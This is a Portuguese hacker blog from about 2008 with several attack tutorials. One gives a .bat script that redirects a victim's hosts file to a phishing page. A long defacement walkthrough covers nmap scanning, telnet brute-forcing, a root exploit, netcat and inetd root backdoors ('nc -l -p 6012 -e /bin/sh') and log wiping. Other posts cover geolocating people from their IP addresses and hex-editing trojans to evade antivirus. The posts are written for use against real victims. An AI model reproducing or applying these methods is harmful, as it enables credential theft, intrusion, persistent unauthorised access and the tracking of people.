ALERTA : depois de criar seu servidor e deixalo indetectavel, por algum
motivo quando o " ProConnective " está on, o Av e capaz de detectalo, ao
fexar o ProConnective, ele não detecta mais. NÃO SEI COMO ISSO IRA SE
PORTAR NA CASA DO PORTADOR DO TROJAN !
Eu não sei como se comporta o antivirus com arquivos .bat executado no
winrar, realmente não vou testalo no meu pc.
GALERA VAMOS DEIXAR UM RECADO AE SOBRE O QUE ACHARAM O/
*Galera eu sabia que isso iria acontecer, CERTIFIQUEM-SE , que o
ProConnective esteja aberto na hora de fazer o test.
Galera, So um recado, conexão reversa do Flux e bem melhor e mais facil,
intaum recomendo que usem ele.
Postado por BTHacker às 12:05
0 comentários
REDIRECIONAMENTO PARA PAGINAS FALSAS
REDIRECIONAMENTO
PARA PAGINAS FALSAS
Para Aqueles que Utilizam Paginas Falsas Para Descubrir Senhas,
Ai Vai a Dica:
Com o Arquivo hosts que
esta localizada na pasta C:\WINDOWS\system32\drivers\etc\hosts,
é possivel redirecionar a para a pagina falsa que voce criou
quando a VITIMA tenta acessar a Página Verdadeira.
Para isso, edite o
arquivo
hosts e escreva
na ultima linha
n°_ip_da_pagina_falsa site_verdadeiro
Por Exemplo:
Voce quer Crackear uma Conta do Hotmail, então voce cria uma
pagina falsa, cuja o IP é 201.109.23.10.
Então na Ultima Linha voce escreve:
201.109.23.10
http://www.hotmail.com
Mas Como Vou Colocar Isso No Arquivo HOSTS da Minha Vitima
`
É Simples. Faça Uma Arquivo Em Lotes com o Código Abaixo:
@ echo off
cd\
echo ip_pagina_falsa site_verdadeiro >> %windir%\system32\drivers\etc\hosts
Salve Com extensão .bat.
Depois Basta Enviar Para a Vitima
Abraço pessoal, Até a Próxima! Espero ter Ajudado!
FUIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
Postado por BTHacker às 12:04
0 comentários
Sábado, 26 de Abril de 2008
RASTREANDO UM ENDEREÇO DE IP
Escrito por SPYNET
Achei esses links interessantes, eles mostram a Cidade/País/CEP de um IP
informado.
E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.
Então vamos há algumas explicações dos passos para rastrear um IP.
Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa
inicial geralmente são:
200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não
é tão comum.
É necessário saber isto para agilizar sua busca, pois não adianta procurar no
sistema de consulta de CEPs um IP lá da China.
Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui
vai a solução:
http://www.maxmind.com/app/lookup
Informe o IP, e será mostrado de qual ele pertence.
______________________________
Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:
Bom tudo começa das estruturas físicas da
rede, físico me refiro a fios, postes, caixas telefônicas, localização do
provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu
CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).
Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu
200.150.30.2, sendo que ele mora no mesmo CEP que vc,
o que aconteceria é que o ping(tempo para recebimento de pacotes)
demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.
O que na realidade deveria ser uns 70ms mais ou menos.
Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho
provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria
assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.
Entendido isso de CEP x IP, vamos a forma de rastreá-los.
______________________________
Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm
um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde
eles colhem essas informações eu não sei, suponho que seja algo vinculado aos
provedores e ao Registro.br.
Então vamos lá, acesse o site:
http://www.ipgeo.com.br
E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP
200.203.3.62
O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois
são os IPs mais semelhantes ao seu, caso encontre
exatamente o IP informado, ele irá ser mostrado no topo da lista.
Resultado obtido:
Citar
Proximidades de IP com CEPs confirmados
200.203.3.62 95020180 Caxias do Sul RS
200.203.3.63 95180000 Farroupilha RS
200.203.3.63 95700000 Bento Gonçalves RS
200.203.3.64 95020320 Caxias do Sul RS
200.203.3.64 95020460 Caxias do Sul RS
200.203.3.64 95097000 Caxias do Sul RS
200.203.3.65 95010100 Caxias do Sul RS
Próximo passo, como localizou meu IP exato, procurei no site dos correios o CEP
que me apresentou.
http://www.correios.com.br/servicos/cep/cep_cep.cfm
E olhem o resultado:
http://i2.tinypic.com/xni4g3.png
Sim, o endereço tá correto mesmo, aqui da empresa.
Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.
Agora acontece também de não mostrar o IP informado e sim só os das
proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre
o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.
Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o
banco de dados pode estar desatualizado, sendo que é feito a nova verificação a
cada 24h, então caso tenha certeza que o resultado mostrado está incorreto,
anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.
Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.
______________________________
Ainda em buscas no Brasil temos outro recurso que é o Registro.br(http://www.registro.br/).
Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de
servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.
Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os
dados do companhia de telecomunicações da região, como Brasil Telecom.
Exemplo, consultei pelo meu IP:
Citar
...
inetnum: 200.203.0/17
asn: AS8167
ID abusos: BTA17
entidade: Brasil Telecom S/A - Filial Distrito Federal
documento: 076.535.764/0326-90
responsável: Brasil Telecom S. A. - CNRS
endereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,
endereço: 70390-025 - Brasilia - DF
telefone: (61) 415-4201 []
ID entidade: BTC14
ID técnico: BTC14
inetrev: 200.203.0/24
servidor DNS: ns3.brasiltelecom.net.br
...
Agora outra consulta, mas pelo IP 200.176.3.142
Citar
...
inetnum: 200.176/16
asn: AS11706
ID abusos: ABT82
entidade: Terra Networks Brasil S.A.
documento: 091.088.328/0003-29
responsável: Hostmaster Terra Networks
endereço: João Manoel, 90,
endereço: 90010-030 - Porto Alegre - RS
telefone: (51) 32844000 []
ID entidade: MPL4
ID técnico: MPL4
inetrev: 200.176.0/18
servidor DNS: ns1.terra.com.br
...
Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP
registrado.
______________________________
Mas e no caso de um IP que não seja do Brasil ?
Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para
isso há outro site americano, MaxMind
que disponibiliza recursos semelhantes ao IPGeo.
Acesse:
http://www.maxmind.com/app/lookup_city
E a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP)
será diferente.
Então como saber onde procurar, aqui:
http://www.embassyworld.com/data/Zip_Codes.html
há uma listagem de serviços e sites que buscam códigos postais de diversos
países.
Vamos a um exemplo na prática!
Enquanto estava no painel de administração do Fanta Hackers observei que tinha
um visitante com IP do exterior, esse: 65.214.39.151
Fiquei curioso e resolvi rastrear ele, vamos aos passos:
- Descobrindo País/Cidade/Estado
Resultado:
http://i2.tinypic.com/xni5n7.png
- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe
informações boas. Para isso consultaremos também no Whois (http://whois.lacnic.net/)
que é o substituto do Registro.br mas para consultar internacionais.
Então tudo certo, os dados estão corretos mesmo:
Citar
OrgName: AskJeeves, Inc.
OrgID: C00555427
Address: 5858 Horton Street
City: Emeryville
StateProv: CA
PostalCode: 94608
Country: US
Bom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos
mostrou inclusive o nome da organização AskJeeves
- Uma consulta rápida no oráculo pela empresa e chegamos à
http://www.ask.com/
- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um
portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados
contidos no Fanta.
Mas vamos continuar a busca:
- Acesse
http://maps.google.com e informe o nome da empresa AskJeeves
- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de
ruas)
- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já
sabemos que a desejada encontra-se em Emeryville - California, selecionamos
esta.
- Chegamos ao resultado preciso abaixo:
http://i3.tinypic.com/xni81h.png
Alguém quer fazer uma visita a eles?
-------
Porém como citei antes, essa foi fácil, localizar uma empresa não é nada
complicado. Mas e no caso de um usuário internacional comum?
Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde
conseguimos chegar.
Nosso IP de exemplo será: 69.18.1.201
- Consultando a localização
http://www.maxmind.com/app/lookup_city
http://i3.tinypic.com/xni8e8.png
- O que identificamos: Local Internet Service Company, bom agora complicou pois
não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.
Ou seja, um usuário comum.
- Seguimos direto para o Google Maps e informamos os dados da cidade:
- Nesse caso o melhor modo de visualização é Map;
- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o
zoom no mapa é bem limitado:
http://i1.tinypic.com/xni8o7.png
- Então vamos tentar no MapQuest(http://www.mapquest.com/)
e informamos o código postal: 52556
Bom, um pouco mais detalhado...
http://i3.tinypic.com/xni92b.png
Com isso as informações que temos, consiguimos chegar até este ponto, não
obtivemos o endereço específico, mas uma noção boa da localização.
______________________________
Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento
seria os seguinte:
- Analise o IP e descubra qual seu país;
http://www.maxmind.com/app/lookup
- Sabendo a nacionalidade:
* Se for nacional:
1) Consulte no
http://www.registro.br
2) Se constatar que o IP não está registrado, pesquise novamente em
http://www.ipgeo.com.br
3) Tendo o CEP em mãos, consulte ele
http://www.correios.com.br/servicos/cep/cep_cep.cfm
* Caso seja internacional:
1) Busque primeiro no Whois:
http://whois.lacnic.net
2) Senão retornar nada útil tente em:
http://www.maxmind.com/app/lookup_city
3) Descoberto o país, consulte em
http://www.embassyworld.com/data/Zip_Codes.html
4) Acesse algum dos sites da lista referente ao país do IP
5) Busque pelo código postal localizado
6) Caso seja americano, uma boa dica é procurar no Google Maps
- E se não conseguiu com nenhuma dessas alternativas, bom aí só resta ligar para
o provedor do IP, e tentar passar uma engenharia
social convencendo eles a te darem os dados do IP. O que eu acho quase
impossível, a menos que vc seja da PF hahaha.
Postado por BTHacker às 07:52
0 comentários
EXEMPLO DE UM SIMPLES ATAQUE
HACKER PARA INICIANTES
Olá pessoal, estou escrevendo esse tópico porque muita gente que nunca
invadiu realmente não faz a mínima idéia de como é fazer tal coisa ou se já
invadiu não sabe o que fazer após "avançar entre as entranhas do alvo". Esse
pode ser um tópico bem idiota eu admito, mas com ele espero dar uma luz para os
iniciantes. Esse tópico vai mostrar o exemplo de um defacement. Como achar um
alvo vulnerável, como não ser pego em uma invasão, etc. Tudo isso em uma pequena
historinha fictícia, mas com ferramentas e vulnerablilidades reais. Vamos
começar.
(1-) O início:
Aqui o hacker que eu vou chamar de Jonathan criou um mirror(página criada para
fazer o defacement de um site substituindo-a pela original) em html. Ela tem um
fundo preto, com uma grande mensagem escrito "Exploited by Cyb3r_D14bl0" que se
trata do apelido hacker de Jonathan, além de uma foto criada por ele muito legal
no photoshop, sua marca registrada, além de um link que permite enviar um email
para ele próprio. John está frustrado e aborrecido porque não encontra nenhum
alvo vulnerável. Mas hoje Jonathan jurou que não sairia da frente do computador
até que conseguisse hackear um site. Jonathan então toma as primeiras
providências para o ataque.
(2-) Escondendo-se na rede:
O fato do mirror de Jonathan ser simples, não significa que ele é um imbecil.
Ele sabe que deve ocultar seu endereço ip ou será pego na primeira tentativa de
ataque. Jonathan começa acessando a página
http://www.stayinvisible.com. Essa página mostra o endereço ip de
seus visitantes. O ip de Jonathan é 201.143.222.88. Então ele usa o programa
Anonymity4Proxy, e procura o endereço ip de um bom servidor proxy na grande
lista do programa. Ele encontra um servidor proxy no México marcado como high
anonymity(alto anonimato). Isso é bom para Jonathan. O endereço ip desse proxy é
67.154.22.224. Jonathan liga o computador do lado que está rodando Linux
slackware 10.2 (ele antes estava em outro com Windows XP sp2). Jonathan
configura os browsers e serviços adicionais de ambos os sistemas para que se
conectem ao proxy. Jonathan acessa a novamente a página
http://www.stayinvisible.com e sorri ao ver que em ambos os
sistemas o seu ip não apareceu mais na página, e sim o ip do proxy que Jonathan
escolheu. Agora ele está anônimo e pronto para atacar.
(3-) FootPriting & FingerPriting. Invadindo...:
Nessa fase do ataque, Jonathan vai procurar por alvos vulneráveis e explorá-los
com o objetivo de invádi-los. Jonathan começa visitando alguns sites e de
repente, sem querer Jonathan acessa um site chamado
http://the-fact-pleasure.net. Se trata de um site de pedofilia! Se
tem uma coisa que Jonathan odeia são os pedófilos. Jonathan escolheu seu
alvo(atenção esse site é fictício). Jonathan começa abrindo um terminal em seu
sistema linux e digitando o seguinte comando no terminal:
# ping -c4 the-fact-pleasure.net
Isso envia 4 pacotes do tipo icmp echo request para o site. Com isso Jonathan
pega o ip do site que é 208.194.22.126 e também Jonathan percebe que o site
normalmente respondeu a todos os pacotes. Isso significa que o firewall do site
não deve estar filtrando tráfego icmp. Jonathan analisa o esquema de
endereçamento ip e deduz as seguintes informações a respeito da rede do alvo:
(a-)Se trata de uma rede de classe C(o ip começa com 3 dígitos maior que 191).
(b-)A máscara da rede é de 255.255.255.0 (somente os últimos 3 digítos dos
endereços ips sofrem alterações).
(c-)Pode-se ter até 255 computadores na rede( 208.194.22.1 até 208.194.22.255).
Agora Jonathan deseja descobrir quais desses host estão online na rede, então
ele vai usar um ping scan utlizando-se do nmap para tal, usando a seguinte linha
de comando:
# nmap -sP -vv 208.194.22.1-255 > /home/log_hosts.txt
Após alguns minutos, Jonathan checa o log e ve que os seguintes hosts estão "alive":
208.194.22.12
208.194.22.17
208.194.22.56
208.194.22.88
208.194.22.100
208.194.22.115
208.194.22.126
208.194.22.201
208.194.22.211
208.194.22.253
Caso o servidor do site esteja muito protegido, Jonathan poderá tentar hackear
esses computadores para usa-los como "trampolin" para o servidor do site. Agora
ele vai fazer o teste de fingerpriting para pegar informações preciosas sobre o
servidor do site. O comando é o segunite:
# nmap -O -vv -sV 208.194.22.126
Esse teste retomou as seguintes informações:
as portas tcp 21,22,25 e 80 estão abertas. (Serviços ftp, ssh, smtp e http).
O sistema operacional é linux red hat 2.4.18 ou 2.4.19(sem certeza).
Na porta 21 está um servidor pureFTPD, na 22 um servidor open ssh 1.1, na 25 um
servidor qmail e por último um apache mod_ssl v 1.3.37]
Jonathan ja adquiriu bastante informações sobre o alvo até aqui. Mas ele deseja
saber mais ja que até aqui ele não encontrou uma vulnerabilidade perigosa que o
permita invadir o sistema. Ele tenta então traçar a rota para descobrir mais
informações a respeito do firewall do alvo, ele então digita o seguinte comando
no seu terminal:
# traceroute 208.194.22.126
Normalmente em um traçamento de rotas, o penúltimo salto é o firewall do alvo e
o penúltimo salto era o endereço ip 194.126.22.1. Agora ele tem o ip do possível
firewall do alvo. Para ter certeza ele faz o seguinte teste com o nmap:
# nmap -vv -O 194.126.22.1
Isso gerou o seguinte resultado:
(a-)as portas 1000 está abertas...
(b-) Device type: firewall/router
Agora Jonathan tem certeza de que se trata de um firewall e um firewall que ele
conhece muito bem. O Web min que é configurado via browser, Jonathan digita a
seguinte url no seu navegador konqueror do linux:
http://194.126.22.1:1000
Uma tela de login de administração de firewall acaba de se abrir no seu
navegador!
Em seguida, Jonathan scaneia a rede do firewall, apenas tentando localizar as
portas 79 e/ou 23 em algum computador aberto, para isso ele usa novamente o nmap
com o seguinte comando:
# nmap -sT -p23,79 -vv 194.126.22.2-255 > /home/log2.txt
Ao analisar o log, Jonathan ve que o host e194.126.22.131 está com as portas 23
e 79 abertas. Jonathan da o comando finger nesse host e enumera os seguintes
usuários:
root
mark
lizie
guest
Jonathan se utiliza do programa Brutus para fazer brute force no telnet e obtém
sucesso. A senha do root é $!#donothackit$!#
Jonathan invade o host e baixa os arquivos passwd e shadow, em seguida faz
cracking deles com o programa john the ripper. Ele deduz que os usuários podem
ser os mesmos para todos os hosts dessa rede, já que foram muito poucos os
computadores marcados como "alive".
Jonathan deduz correto. A conta login mark/password h4xor1234 é a conta do
administrador do firewall. Antes de simplesmente derrubar o firewall do alvo,
Jonathan faz outro teste com o nmap no site para descobrir quais portas estão
abertas, mas que estão sendo filtradas pelo firewall. Jonatham executa o
seguinte comando no seu terminal:
#nmap -sA -vv -p1-200 208.194.22.126
As seguintes portas estão marcadas como "unfiltered": 21,22,23,53,69,79,80,110
Bingo! Mais um telnet! Agora sim Jonathan invade o firewall derrubando-o e em
seguida da um finger no sistema. Jonathan consegue apenas enumerar o usuário
lilith. Ele usa novamente o brutus para fazer brute force no telnet e descobre a
senha do usuário lilith. Ele conseguiu uma shell remota em seu alvo com poderes
normais.
a saída foi:
[server04@lilith]$
Jonathan digita id e ve o que ele possui um uid = 1000 e um gid = 1000. Ele
precisa obter acesso root para fazer o defacement. Ele lembra da versão do
apache e tem uma idéia. Primeiro ele executa esse comando na shell:
$find /bin -perm +4000
Ele sorri ao ver que a sua conta hackeada tem permissão para usar o ftp. Ele
conecta em um ftp de um site hacker, baixa um exploit local que explora um bug
no apache. Em seguida Jonathan o compila:
$gcc -o gotRoot exploit_exemplo.c
E o executa....
Jonathan fica empolgado e a adrenalina no seu corpo aumenta. ele ve outra shell
em sua tela
[server04@root]#
Ele digita esses comandos só para confirmar
# id
# whoami
Ele está logado como root! Sem perder tempo ele executa o seguinte comando:
# whereis apache
a saida foi:
/home/root/apache
Basta executar:
# cd /home/root/apache
# cd htdocs
Jonathan executa um ls e pronto! Ele localiza o index1.html! Agora é hora de
desfigurar a página:
Ele remove a página usando o comando:
# rm index1.html
Em seguida ele vai transferir seu mirro via linha de comando. Seu computador
está com o serviço ativo de ftp, então Jonathan usa o servidor do site no seu
computador dando o seguinte comando:
# ftp 201.143.222.88 user Cyber pass Diablo
Após conectar, basta dar o seguinte comando:
> get index1.html
Agora Jonathan desconecta do seu ftp e move o mirror para o local da página
original com o seguinte comando:
mv /ftp-files/index1.html /home/root/apache/htdocs
Pronto, a página foi desfigurada! Agora Jonathan precisa dar um jeito de criar
suas backdoors e apagar seus rastros no sistema.
(4-) Backdoors:
Primeiramente, Jonathan foi para o diretório principal do sistema com o comando:
# cd /etc
Lá, ele editou o arquivo rc.local com o editor vi inserindo a seguinte linha de
comando nele:
nc -l -p 6012 -e /bin/sh
Isso lhe da uma shell imediata com poderes de root sem qualquer forma de
autenticação na porta tcp 6012 no próximo boot do sistema.
Jonathan cria uma conta pirata no sistema com poderes de root com o comando
adduser e depois altera os privilégios de uma conta qualquer para root, assim
despistando os administradores.
Por último, Jonathan percebe que o sistema é antigo, pois possui o arquivo
inetd.conf em /etc. Ele edita esse arquivo também com o vi inserond o nele o
seguinte conteúdo:
cool stream tcp nowait root /bin/sh -i
E depois também edita arquivo services com o seguinte conteúdo:
cool 775/tcp cnn
Mais uma shell para Jonathan....
Agora com suas backdoors, Jonathan vai apagar os logs do sistema para não ser
pego usando esses comandos:
# echo " " > /var/log/ossec/*.log
# echo " " > /home/root/apache/logs/*.log
# echo " " > ~ .bash_history
# echo " " > /var/log/ossec/*.log
Com isso todos os logs do sistema ficam com conteúdo em branco(nulo). Por
último, Jonathan da um reboot no sistema para suas backdoors serem ativadas, ele
desconecta do seu alvo e proxy. Jonathan sorri ao acessar
http://the-fact-pleasure.net e visualizar seu mirror. E o melhor
de tud é que ele dificilmente vai ser pego por isso...
Bom gente é isso ai, espero que vocês gostem. Isso é ridiculo para os hackers
experientes desse fórum, mas espero ter ajudado os iniciantes a entenderem como
um ataque hacker é realizado. Foi um exemplo simples, mas espero que tenha
valido a pena. Abraço pra todos, fui.
Postado por BTHacker às 07:51
0 comentários
Windows Admin Password Hack
Olá pessoal, estou aqui no fórum com mais tuto!
Se você esqueceu da senha do seu PC ou se você brigou com seu amigo de quarto e
ele botou uma senha no Windows e você não tem acesso nenhum ao PC, não se
preocupe! Vamos aprender a quebrar senha do
Windows através do Boot!
Mas o que é Boot?
Em computação, boot é o termo em inglês
para o processo de iniciação do computador que carrega o
sistema operacional quando a máquina é ligada(fonte: wikipedia), ou seja, é
o que define o que vai ser carregado. Resumindo, a MB(motherboard), é programada
geralmente para dar boot no HD, para iniciar o Windows.
Mais o que isso tem haver com quebrar a senha do
Windows?
Bom vamos usar um programa chamado Windows Admin
Password Hack, que quebra a senha do Windows atraves do boot! Mas o
programa só vai funcionar se estiver gravado em um CD e em formato
.iso .
Pra isso você grava somente o arquivo cd050303
em um CD virgem!
Pronto, quando o computador ligar na tela do BIOS você insere o CD no Drive!
DOWNLOAD:
Senha:
http://www.invasao.com.br
Postado por BTHacker às 07:45
1 comentários
INJETANDO CÓDIGOS
Neste tutorial vamos ver como injetar novos códigos em um
executável já compilado. Vamos modificar o bloco de notas do
windows para que exiba uma simples mensagem de texto ( pois é uma
das função mais fáceis que o Windows fornece ) quando for
iniciado.
Antes de tudo, faça uma cópia do bloco de notas ( C:\WINDOWS\notepad.exe
) para uma pasta qualquer ( vamos usar essa cópia, pra preservar o
original ). O que nós vamos fazer é o seguinte: desviar o início
do código do notepad para outro local, exibir a mensagem e depois
retornar ao ponto original.
Para fazer isso, precisamos encontrar na seção do código do
notepad, um local vazio, que não altere a
funcionalidade do programa, o que é chamado de "Code-cave".
Abra o notepad.exe no Olly e role o código para baixo. Lá pelo
offset 8747 você deve encontrar o início da code-cave, uma seção
sem código algum, apenas com valores 00:
Essa região a partir de 8747 é a que vamos utilizar para escrever
nosso código. Como disse, vamos adicionar uma MessageBox no início
da execução. Vamos dar uma olhada na função MessageBoxA para ver o
que nós precisamos:
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
Para chamar a função, precisamos passar 4 argumentos. hWnd indica
à qual janela a Msgbox pertence. lpText e lpCaption são o texto da
mensagem e o título da janela, respectivamente. E por útlimo,
uType indica o estilo da janela, como número de botões e ícones.
Precisamos gravar o texto e o título da janela em algum lugar, e
esse lugar é a própria code-cave. Vamos ao título primeiro.
A partir do início da code-cave, selecione o número de linhas que
você vai usar para armazenar o título, sendo que cada linha que
você selecionar vai ocupar o espaco de 1 caractere. Vou usar como
título "F3rGO!", que contém 6 caracteres. Então seleciono 6 linhas
a partir do início da CV ( code-cave ), usando SHIFT, clico com o
botão direito sobre a seleção e em seguida "Binary->Edit". Em
seguida, marque a caixa "Keep Size" e digite a sua mensagem no
campo ASCII:
Aperte OK. O Olly primeiramente entede o que você digitou como uma
sequência de comandos, por isso a sua mensagem não apareceu
corretamente na janela de código. Aperte CTRL+A para o Olly
analisar o cógido novamente e aí sim você deve ver a sua string
corretamente. Repita o mesmo processo para o texto da janela (
selecionando as linhas a partir da linha que contém o seu título
). Eu usei como texto "Notepad modificado!", que contém 19
caracteres ( espaços contam como caracteres ). Selecione as 19
linhas e faça o mesmo que você fez para o título. No final, terá
algo assim:
Já temos armazenado as nossas strings, então podemos chamar a
função. Lembre-se que os argumentos da função são puxados na ordem
inversa, ou seja, devemos usar o comando PUSH partido da uType
para o hWnd. Escolha um offset qualquer da CV ( pode ser logo
abaixo das strings ). Eu usei o 01008763. Escreva o código da
chamda da função ( na hora de puxar o título e texto, indique o
endereço de cada um no código ( 01008747 e 0100874E no meu caso
)). Para escrever o código, basta dar 2 cliques sobre a linha e
entrar com o comando. Seu código deve ficar assim ( os comentários
eu adicionei ):
Já temos o código da msgbox, precisamos desviar o ínicio do
programa 01008763 para chamar a mensagem e depois retornar à
sequência de código original. Ainda não vamos adicionar o JMP de
retorno após a chamada por motivos que vou explicar adiante.
Memorize o endereço 01008763, pois é para ele que vamos desviar (
ja que é onde tem início a chamada da msgbox ).
Clique com o botão direito em qualquer lugar do código e em
seguida "Goto->Origin *". Fomos levado até o EntryPoint ( ponto de
entrada ) do programa.
0100739D 6A 70 PUSH 70
0100739F 68 98180001 PUSH NOTEPAD.01001898
010073A4 E8 BF010000 CALL NOTEPAD.01007568
010073A9 33DB XOR EBX,EBX
Vamos ter que alterar o PUSH 70 para um jump até o endereço
01008763. Antes de alterar, anote os comandos desses 2 primeiros
offsets ( PUSH 70 e PUSH NOTEPAD... ). Já explico o porquê. Agora
dê um duplo clique sobre o PUSH 70 e altere para JMP 01008763 (
marque a opção Fill with NOP's ). Certo, desviamos o nosso código,
mas repare que foram perdidos 2 comandos devido a esse jump ( os 2
que você anotou ). Isso se dá ao fato que o comando JMP ocupa o
espaço do PUSH 70 e de parte do outro PUSH, completando com NOPs
os bytes que sobraram. Não podemos deixar assim, precisamos de
alguma maneira adicionar esses 2 comandos perdidos em algum lugar.
Onde? Na code-cave após a chamada da MessageBoxA.
Antes de voltar para a MessageBox, anote o offset do CALL
NOTEPAD.01007568 ( 010073A4 ), pois depois da msgbox ser exibida,
nós vamos ter que pular nesse endereço, para que a execução
continue.
Volte para a região da sua MessageBox e adicione os 2 comandos
anotados ( quando for adicionar o segundo comando, deixe somente o
push com o endereço, remova o texto "NOTEPAD." ). Agora podemos
realizar o jump de retorno ao código normal. Basta adicionar um
novo JMP após o fim do código injetado para o endereço 010073A4 (
offset que você acabou de anotar ). No final das contas, seu
código deve ter ficado semelhante a isso:
Pode salvar seu arquivo ( "Botão Direito->Copy to Exetuable->All
Modifications->Copy All->Botão Direito->Save File" ) e testar. Se
você fez tudo certo, deve ter visto isso ao iniciar o seu bloco de
notas modificado
Até a próxima!
F3rGO!
--
Fonte: fergo.110mb.com/engrev/tut10/tut_engrev10.html
Autor: Fergo
Não podia deixar de postar esse tutorial magnífico do senhor Fergo
..
Ótimo conteúdo .. muito bom mesmo .. !
Espero que aproveitem .. !
Postado por BTHacker às 07:44
0 comentários
CAMUFLAR UM VIRUS COM HEXA DECIMAL
CAMUFLANDO UM VIRUS COM
HEXADECIMAL, TORNANDO-O INDETECTAVEL
Antes de começarmos eu sei que irá haver muitas perguntas sobre o por que de
se editar hexadecimalmente um trojan, tudo está diretamente relacionado à como o
vírus é detectado pelo anti-vírus... O seu anti-vírus procura pelo código
hexadecimal dentro dos programas para ver se batem com os números hexadecimais
que ele tem guardado em sua assinatura (aquele arquivo que é atualizado
constantemente), se coincidir os números, é vírus hehe. Tendo essa idéia em
mente, uma saída simples é essa: altere esse código que está cusando problemas!
Como? vamos lá:
Precisamos de:
-Um editor hexadecimal (usaremos o HEXPlorer por ser freeware)
Download
-Um server de qualquer trojan
-E por último um anti-vírus
Simplesmente após criar seu server (deiche seu anti-vírus desligado), abra ele
com o Hexplorer, vários números aparecerão. Role a tela até mais ou menos a
metade, selecione TODOS os números dalí para baixo.
Após feito isso, note um botão no canto superior direito, ele tem o formato de
um ZERO, clique nele, perceba que todos os números selecionados viraram ZEROS
Para compreender o quê isso está fazendo é simples, o ZERO na linguagem
hexadecimal significa um ponto sem operação, o ZERO é nulo... Após feito isso
salve o arquivo em um outro local, vá até aquele local, e apertando o botão
direito, selecione a opção do seu antivírus que diz para escanear por vírus. Se
o seu anti-vírus achou alguma coisa, exelente, isso significa que o código que o
indentifica como sendo um vírus está na parte inferior de todos aqueles números
hexadecimais. Se achou algo é o contrário, o código está na parte superior.
Agora vamos para a parte menos complicada, volte para o hexplorer e dê um CTRL+Z
para voltar ao formato original. Se seu anti-vírus não localizou nada, comece
"zerando" os números por partes de baixo para sima, se ele localiou, comece pelo
contrário.
Após localizar os números hexadecimais que seu anti-vírus capta como sendo um
vírus, mude-os de forma que não afete o arquivo...
Pontos a declarar:
-Não pence que será fácil mudar os números sem corromper o arquivo;
-Não pence que TODOS os antí-vírus não irão mais detectar seu vírus, isso ocorre
por que cada anti-vírus possue um número diferente que identifica o vírus como
sendo o próprio. Mais não fique desanimado, muitos anti-vírus possuem
assinaturas iguais para pegar os vírus...
-E por último mas mais importante: fassa seu próprio trojan. Mantenha ele em
versão privada para somente o você usar.
Programa do tutorial
Download :
http://www.sofotex.com/downloads/d26421.html
Postado por BTHacker às 07:40
0 comentários
Postagens mais recentes
Postagens mais antigas
Início
Chat
Get your own Chat Box!
Go Large!
Relogio
Parceiros
Contador
Mural de Recados
Design by Ferramentas para blog , suporte by blogtools
Nenhum comentário:
Postar um comentário